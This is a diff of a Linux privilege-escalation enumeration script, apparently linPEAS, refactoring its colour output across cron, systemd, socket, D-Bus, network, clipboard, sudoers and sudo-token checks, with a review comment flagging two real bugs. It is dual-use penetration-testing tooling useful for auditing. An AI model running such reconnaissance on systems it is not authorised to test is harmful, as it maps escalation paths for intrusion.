\-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" + cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," crontab -l -u "$USER" 2>/dev/null | tr -d "\r" ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ 2>/dev/null #MacOS paths echo "" #-- PCS) Services - printf $Y"[+] "$GREEN"Services\n"$NC - printf $B"[i] "$Y"Search for outdated versions\n"$NC + print_2title "Services" + print_info "Search for outdated versions" (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" echo "" #-- PSC) systemd PATH - printf $Y"[+] "$GREEN"Systemd PATH\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths\n"$NC - systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${C}[1;31;103m&${C}[0m,g" + print_2title "Systemd PATH" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" + systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" WRITABLESYSTEMDPATH=`systemctl show-environment 2>/dev/null | grep 
"PATH" | grep -E "$Wfolders"` echo "" #-- PSC) .service files #TODO: .service files in MACOS are folders - printf $Y"[+] "$GREEN"Analyzing .service files\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#services\n"$NC - services=$(echo "$FIND_ETC\n$FIND_LIB\n$FIND_RUN\n$FIND_USR\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYS\n$FIND_SNAP" | grep -E '\.service') - printf "%s\n" "$services\n" | while read s; do + print_2title "Analyzing .service files" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" + printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do if [ ! -O "$s" ]; then #Remove services that belongs to the current user - if [ -w "$s" ] && [ -f "$s" ]; then - echo "$s" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,g" + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" fi servicebinpaths="`grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' \"$s\" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,'`" #Get invoked paths printf "%s\n" "$servicebinpaths\n" | while read sp; do if [ -w "$sp" ]; then - echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${C}[1;31;103m&${C}[0m,g" + echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" fi done relpath1="`grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' \"$s\" 2>/dev/null | grep -Iv \"=/\"`" relpath2="`grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' \"$s\" 2>/dev/null | grep -Ev \"/[a-zA-Z0-9_]+/\"`" if [ "$relpath1" ] || [ "$relpath2" ]; then if [ "$WRITABLESYSTEMDPATH" ]; then - echo "$s is executing some relative path" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; + echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; else echo "$s is executing some relative path" fi fi fi done - if [ ! 
"$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${C}[1;32m&${C}[0m,"; fi + if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi echo "" - + #-- PSC) Timers - printf $Y"[+] "$GREEN"System timers\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers\n"$NC - (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${C}[1;32m&${C}[0m,") || echo_not_found + print_2title "System timers" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" + (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found echo "" #-- PSC) .timer files - printf $Y"[+] "$GREEN"Analyzing .timer files\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers\n"$NC - timers=$(echo "$FIND_ETC\n$FIND_LIB\n$FIND_RUN\n$FIND_USR\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYS\n$FIND_SNAP" | grep -E '\.timer') - printf "%s\n" "$timers\n" | while read t; do - if [ -w "$t" ]; then - echo "$t" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" + print_2title "Analyzing .timer files" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" + printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do + if ! 
[ "$IAMROOT" ] && [ -w "$t" ]; then + echo "$t" | sed -${E} "s,.*,${SED_RED},g" fi timerbinpaths="`grep -Po '^Unit=*(.*?$)' \"$t\" 2>/dev/null | cut -d '=' -f2`" printf "%s\n" "$timerbinpaths" | while read tb; do if [ -w "$tb" ]; then - echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${C}[1;31m&${C}[0m,g" + echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" fi done #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" #for rp in "$relpath"; do - # echo "$t is calling a relative path: $rp" | sed "s,relative.*,${C}[1;31m&${C}[0m,g" + # echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" #done done echo "" #-- PSC) .socket files #TODO: .socket files in MACOS are folders - printf $Y"[+] "$GREEN"Analyzing .socket files\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets\n"$NC - sockets=$(echo "$FIND_ETC\n$FIND_LIB\n$FIND_RUN\n$FIND_USR\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYS\n$FIND_SNAP" | grep -E '\.socket') - printf "%s\n" "$sockets" | while read s; do - if [ -w "$s" ] && [ -f "$s" ]; then - echo "Writable .socket file: $s" | sed "s,/.*,${C}[1;31m&${C}[0m,g" + print_2title "Analyzing .socket files" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" + printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do + if ! 
[ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" fi socketsbinpaths="`grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' \"$s\" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,'`" printf "%s\n" "$socketsbinpaths" | while read sb; do if [ -w "$sb" ]; then - echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${C}[1;31m&${C}[0m,g" + echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" fi done socketslistpaths="`grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' \"$s\" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,'`" printf "%s\n" "$socketsbinpaths" | while read sl; do if [ -w "$sl" ]; then - echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${C}[1;31m&${C}[0m,g"; + echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; fi done done - if [ -w "/var/run/docker.sock" ]; then - echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${C}[1;31;103m&${C}[0m,g" + if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then + echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" fi - if [ -w "/run/docker.sock" ]; then - echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${C}[1;31;103m&${C}[0m,g" + if ! 
[ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then + echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" fi echo "" #-- PSC) Search HTTP sockets - printf $Y"[+] "$GREEN"HTTP sockets\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets\n"$NC + print_2title "HTTP sockets" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1 | while read s; do socketcurl="`curl --max-time 2 --unix-socket \"$s\" http:/index 2>/dev/null`" if [ $? -eq 0 ]; then owner="`ls -l \"$s\" | cut -d ' ' -f 3`" - echo "Socket $s owned by $owner uses HTTP. Response to /index:" | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$groupsVB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$knw_grps,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$idB,${C}[1;31m&${C}[0m,g" + echo "Socket $s owned by $owner uses HTTP. 
Response to /index:" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" echo "$socketcurl" fi done echo "" #-- PSC) Writable and weak policies in D-Bus config files - printf $Y"[+] "$GREEN"D-Bus config files\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus\n"$NC - dbusfols=$(echo "$FIND_DIR_ETC" | grep -E '/dbus-1/system.d|/dbus-1/session.d') - if [ "$dbusfols" ]; then - printf "%s\n" "$dbusfols" | while read d; do + print_2title "D-Bus config files" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" + if [ "$PSTORAGE_DBUS" ]; then + printf "%s\n" "$PSTORAGE_DBUS" | while read d; do for f in $d/*; do - if [ -w "$f" ]; then - echo "Writable $f" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" + if ! 
[ "$IAMROOT" ] && [ -w "$f" ]; then + echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" fi genpol=`grep "" "$f" 2>/dev/null` - if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$mygroups,${C}[1;31m&${C}[0m,g"; fi - #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${C}[1;31m&${C}[0m,g"; fi - + if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi + userpol=`grep "/dev/null | grep -v "root"` - if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$mygroups,${C}[1;31m&${C}[0m,g"; fi + if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi #for g in `groups`; do - # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${C}[1;31m&${C}[0m,g"; fi + # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi #done - grppol=`grep "/dev/null | grep -v "root"` - if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed -${E} 
"s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$mygroups,${C}[1;31m&${C}[0m,g"; fi + grppol=`grep "/dev/null | grep -v "root"` + if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi #TODO: identify allows in context="default" done @@ -1592,17 +1677,17 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then fi echo "" - printf $Y"[+] "$GREEN"D-Bus Service Objects list\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus\n"$NC + print_2title "D-Bus Service Objects list" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" dbuslist=$(busctl list 2>/dev/null) if [ "$dbuslist" ]; then busctl list | while read line; do - echo "$line" | sed -${E} "s,$dbuslistG,${C}[1;32m&${C}[0m,g"; + echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g"; if [ ! "`echo \"$line\" | grep -E \"$dbuslistG\"`" ]; then srvc_object=`echo $line | cut -d " " -f1` srvc_object_info=`busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' '` if [ "$srvc_object_info" ]; then - echo " -- $srvc_object_info" | sed "s,UID=0,${C}[1;31m&${C}[0m," + echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," fi fi done 
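Review bot: The writable-listener report on the new `echo "$s is calling this writable listener: $sl"` line can never fire for a Listen= path, because the enclosing loop header (a context line immediately above it) reads `$socketsbinpaths` instead of the `$socketslistpaths` variable computed for exactly this purpose; it should be `printf "%s\n" "$socketslistpaths" | while read sl; do`. In the same hunk, the `/run/docker.sock` branch highlights its finding with `sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g"`, which does not match the text that branch echoes, so a writable `/run/docker.sock` is printed without the red/yellow marker; the pattern should be `s,/run/docker.sock is writable,${SED_RED_YELLOW},g`. Both issues are visible in the hunk and neither is introduced by the colour refactor, but the touched lines are the natural place to fix them. The enclosing `ProCronSrvcsTmrsSocks` check block starts before this hunk.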
@@ -1620,55 +1705,55 @@ if [ "`echo $CHECKS | grep Net`" ]; then ########################################### #---------) Network Information (---------# ########################################### - printf $B"═══════════════════════════════════╣ "$GREEN"Network Information"$B" ╠════════════════════════════════════\n"$NC + print_title "Network Information" #-- NI) Hostname, hosts and DNS - printf $Y"[+] "$GREEN"Hostname, hosts and DNS\n"$NC + print_2title "Hostname, hosts and DNS" cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null - dnsdomainname 2>/dev/null || echo_not_found "dnsdomainname" + dnsdomainname 2>/dev/null || echo_not_found "dnsdomainname" echo "" #-- NI) /etc/inetd.conf - printf $Y"[+] "$GREEN"Content of /etc/inetd.conf & /etc/xinetd.conf\n"$NC - (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" + print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" + (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" echo "" #-- NI) Interfaces - printf $Y"[+] "$GREEN"Interfaces\n"$NC + print_2title "Interfaces" cat /etc/networks 2>/dev/null (ifconfig || ip a) 2>/dev/null echo "" #-- NI) Neighbours - printf $Y"[+] "$GREEN"Networks and neighbours\n"$NC + print_2title "Networks and neighbours" (route || ip n || cat /proc/net/route) 2>/dev/null (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null echo "" #-- NI) Iptables - printf $Y"[+] "$GREEN"Iptables rules\n"$NC + print_2title "Iptables rules" (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" echo "" #-- NI) Ports - printf $Y"[+] "$GREEN"Active Ports\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports\n"$NC - ((netstat -punta || ss -ntpu || 
(netstat -a -p tcp && netstat -a -p udp)) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+,${C}[1;31m&${C}[0m," + print_2title "Active Ports" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" + ((netstat -punta || ss -ntpu || (netstat -a -p tcp && netstat -a -p udp)) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+,${SED_RED}," echo "" #-- NI) tcpdump - printf $Y"[+] "$GREEN"Can I sniff with tcpdump?\n"$NC + print_2title "Can I sniff with tcpdump?" timeout 1 tcpdump >/dev/null 2>&1 if [ $? -eq 124 ]; then #If 124, then timed out == It worked - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing\n"$NC - echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" + echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," else echo_no fi echo "" #-- NI) Internet access if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then - printf $Y"[+] "$GREEN"Internet Access?\n"$NC + print_2title "Internet Access?" check_tcp_80 2>/dev/null & check_tcp_443 2>/dev/null & check_icmp 2>/dev/null & 
@@ -1685,16 +1770,16 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then ########################################### #----------) Users Information (----------# ########################################### - printf $B"════════════════════════════════════╣ "$GREEN"Users Information"$B" ╠════════════════════════════════════\n"$NC + print_title "Users Information" #-- UI) My user - printf $Y"[+] "$GREEN"My user\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#users\n"$NC - (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$groupsVB,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$knw_grps,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$idB,${C}[1;31m&${C}[0m,g" + print_2title "My user" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" + (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" echo "" #-- UI) PGP keys? - printf $Y"[+] "$GREEN"Do I have PGP keys?\n"$NC + print_2title "Do I have PGP keys?" command -v gpg 2>/dev/null || echo_not_found "gpg" gpg --list-keys 2>/dev/null command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" 
@@ -1703,46 +1788,46 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then echo "" #-- UI) Clipboard and highlighted text - printf $Y"[+] "$GREEN"Clipboard or highlighted text?\n"$NC + print_2title "Clipboard or highlighted text?" if [ `command -v xclip 2>/dev/null` ]; then - echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${C}[1;31m&${C}[0m," - echo "Highlighted text: "`xclip -o 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${C}[1;31m&${C}[0m," + echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "`xclip -o 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${SED_RED}," elif [ `command -v xsel 2>/dev/null` ]; then - echo "Clipboard: "`xsel -ob 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${C}[1;31m&${C}[0m," - echo "Highlighted text: "`xsel -o 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${C}[1;31m&${C}[0m," + echo "Clipboard: "`xsel -ob 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "`xsel -o 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${SED_RED}," else echo_not_found "xsel and xclip" fi echo "" #-- UI) Sudo -l - printf $Y"[+] "$GREEN"Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid\n"$NC - (echo '' | sudo -S -l | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sudoVB,${C}[1;31;103m&${C}[0m," | sed "s,\!root,${C}[1;31m&${C}[0m,") 2>/dev/null || echo_not_found "sudo" + print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" + (echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB,${SED_RED_YELLOW}," | sed 
"s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" if [ "$PASSWORD" ]; then - (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sudoVB,${C}[1;31;103m&${C}[0m,") 2>/dev/null || echo_not_found "sudo" + (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" fi - (cat /etc/sudoers | grep -v "^$" | grep -v "#" | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed "s,pwfeedback,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sudoVB,${C}[1;31;103m&${C}[0m,") 2>/dev/null || echo_not_found "/etc/sudoers" - if [ -w '/etc/sudoers.d/' ]; then - echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + (cat /etc/sudoers | grep -Iv "^$" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" + if ! 
[ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then + echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," fi for filename in '/etc/sudoers.d/*'; do if [ -r "$filename" ]; then - echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" - cat "$filename" | grep -v "^$" | grep -v "#" | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed "s,pwfeedback,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sudoVB,${C}[1;31;103m&${C}[0m," + echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" + cat "$filename" | grep -Iv "^$" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB,${SED_RED_YELLOW}," fi done echo "" #-- UI) Sudo tokens - printf $Y"[+] "$GREEN"Checking sudo tokens\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens\n"$NC + print_2title "Checking sudo tokens" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" ptrace_scope="`cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null`" - if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "/proc/sys/kernel/yama/ptrace_scope is enabled (0)" | sed "s,0,${C}[1;31m&${C}[0m,g"; - else echo "/proc/sys/kernel/yama/ptrace_scope is not enabled ($ptrace_scope)" | sed "s,is not enabled,${C}[1;32m&${C}[0m,g"; + if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "/proc/sys/kernel/yama/ptrace_scope is enabled (0)" | sed "s,0,${SED_RED},g"; + else echo "/proc/sys/kernel/yama/ptrace_scope is not enabled ($ptrace_scope)" | sed "s,is not enabled,${SED_GREEN},g"; fi is_gdb="`command -v gdb 2>/dev/null`" - if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g"; - else echo "gdb wasn't found in PATH" | sed 
"s,gdb,${C}[1;32m&${C}[0m,g"; + if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; + else echo "gdb wasn't found in PATH" | sed "s,gdb,${SED_GREEN},g"; fi if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then echo "Checking for sudo tokens in other shells owned by current user" 
